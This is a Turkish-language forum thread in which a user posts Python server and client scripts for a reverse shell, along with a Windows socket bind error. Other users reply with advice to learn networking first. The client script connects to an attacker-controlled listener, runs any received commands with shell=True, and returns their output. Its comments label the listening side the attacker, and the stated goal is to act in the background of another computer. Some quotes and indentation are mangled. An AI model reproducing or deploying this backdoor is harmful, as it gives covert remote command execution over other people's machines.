Python Reverse Shell --Windows 10

Herkese merhaba

Ben kendi bilgisayarımda ki server.py 'den client.py bulunan başka bilgisayarın arka planın da işlem yapmak istiyorum . Ve bu işlemleri yaparken hata aldım ama kodları tekrar tekrar kontrol ettim . Acaba Kali Linux kullanmam şart mı ?

Görüntünün neden böyle olduğunu bilmiyorum Taslağı oluştururken böyle gözükmüyor . Düzeltemiyorum . Umarım anlarsınız .
Server.py

import socket #Socket oluşturmak için kullandığımız modül
port=6161 #Saldırganın dinleyeceği port adresi
ip=“192.168.0.34” #Saldırgan’ın dış dünya ile bağlantısını sağlayan IP adresi
def baglanti():
Socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
Socket.bind((ip,port))
Socket.listen(1)
socketaddr,ipaddr= Socket.accept()
print ‘Baglanti gerceklesti’,ipaddr

while True:
komut= raw_input("Shell> ")
if ‘cikis’ in komut:
socketaddr.send(‘cikis’)
socketaddr.close()
break
else:
socketaddr.send(komut)
print socketaddr.recv(1024)
baglanti()

Client.py

import socket
import subprocess
port=6161
ip=“192.168.0.34”
def baglanti():
Socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
Socket.connect((ip,port))
while True:
komut = Socket.recv(1024)

if 'cikis' in komut:
       Socket.close()
       break
   else:
       CMD=subprocess.Popen(komut, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
       Socket.send(CMD.stdout.read())
       Socket.send(CMD.stderr.read())

baglanti()

Ve server.py den aldığım hata ise

C:\Users\CEM\PycharmProjects\BASE\venv\Scripts\python.exe C:/Users/CEM/Desktop/server.py
Traceback (most recent call last):
File “C:/Users/CEM/Desktop/server.py”, line 20, in
baglanti()
File “C:/Users/CEM/Desktop/server.py”, line 6, in baglanti
Socket.bind((ip,port))
OSError: [WinError 10049] İstenen adres içeriğinde geçerli değil

Process finished with exit code 1

Denediğim işletim sistemi Windows . Şimdiden teşekkürler :slight_smile:

c3mcavus

Daha önce başka bir yorumumda da demiştim önce network bilgisi.Sonra bunlar bence.Ve hayır kali linux kullanmak zorunda değilsin.Hatta hiç kullanmamanı tavsiye ederim.

2 Beğeni

Ben boyle islem yapan bir program yazmisdim esgiden isterseniz size gondere bilirim.

http://python4hackers.com/python-network-hacking-tools/python-reverse-tcp-shell-socket-create.html

Sanırım kodu buradan aldınız.Peki buranın tamamını okudunuz mu? Socket nedir kısmını? Nasıl çalıştığı kısmını? Ya da baktınız mı hangi subnet te olduğunuz baktınız mı? Reverse bağlanılacak olan cihazın hangi ip adresine sahip olduğuna baktınız mı? Yoksa direk yazdınız mı rastgele ya da onun gibi bir şey mi? Bakın az da olsa network bilgisi ile cevaplanılabilinilecek sorular bunlar :slight_smile:

1 Beğeni

Şimdi size şöyle bir örnek vereyim siz programlamaya başladınız ilk başta nedir algoritmanın temelleri atılmıştır yani aslında programlama dilleri araç değil aracı dır demek istediğim şuki programlama dili aslında bizim bilgisayara derdimizi anlattığımız bir compiler dir bizim yerimize bunu makine kodlarına çevriyor ama önce algoritma
Demek istediğim şu ki siz networkü öğrendiğiniz zaman python size araç değil aracı olacak sizin network bilginizi python ile bilgisayara anlatacaksınız ama network bilginiz yoksa çıkan sorunlar karşısında hiçbir şey yapamazsınız önce NETWORK sonra reverse shell :slight_smile:

1 Beğeni

Haklısınız @_Alparslan_55
Teşekkürler tekrar

Dediklerinizi uygulayacağım . Tekrardan teşekkürler @Asosyal_Futbolcu

1 Beğeni